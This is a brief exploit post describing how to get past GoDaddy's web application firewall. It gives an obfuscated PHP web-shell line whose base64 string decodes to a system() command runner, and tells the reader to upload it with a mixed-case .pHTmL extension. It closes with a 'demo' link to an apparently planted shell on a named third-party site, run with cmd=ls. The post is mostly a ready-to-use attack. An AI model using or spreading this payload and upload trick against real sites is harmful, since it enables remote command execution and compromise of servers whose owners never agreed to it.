[+] Reason I'm Submitting this -> GoDaddy ignored my emails :////
[+] Works in bypassing WAF as of Feb 2021
[+] ONLY works if the site's uploader is flawed. This only bypasses the WAF that protects the site.
$func = create_function('$a', base64_decode('c3lzdGVtKCIkYSIpOw=='));
Then upload as .pHTmL. (Very stupid subtle change bypasses WAF. How disappointing)
[+] Credits to Bloos3rpent
[+] DEMO of course. :::: https://www.collegeday.online/login/uploads/rce.pHTML?cmd=ls